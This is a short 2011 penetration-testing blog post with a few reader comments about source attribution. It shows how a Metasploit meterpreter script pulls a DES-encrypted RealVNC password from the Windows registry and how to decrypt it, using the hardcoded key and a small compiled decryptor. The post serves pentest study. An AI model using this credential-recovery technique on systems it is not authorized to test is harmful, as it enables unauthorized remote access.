Mar 16, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
or use this one
where you can just put your hash on the command line and don't have to recompile every time.



CG said...
This comment has been removed by the author.
Medt said...

In the last of all my post, I will post where I get it from which "Source:" and this post I said the source is "Source: ".

Did you see it?

Medt said...

For CG, I'm so sorry that is my mistake to delete your comment. I really don't want to do like that. -*- Sorry again. And I want to tell you every posts in this blog I always link it to the source with "Source:", I'm so sorry if you think I'm unclear about the source of this article.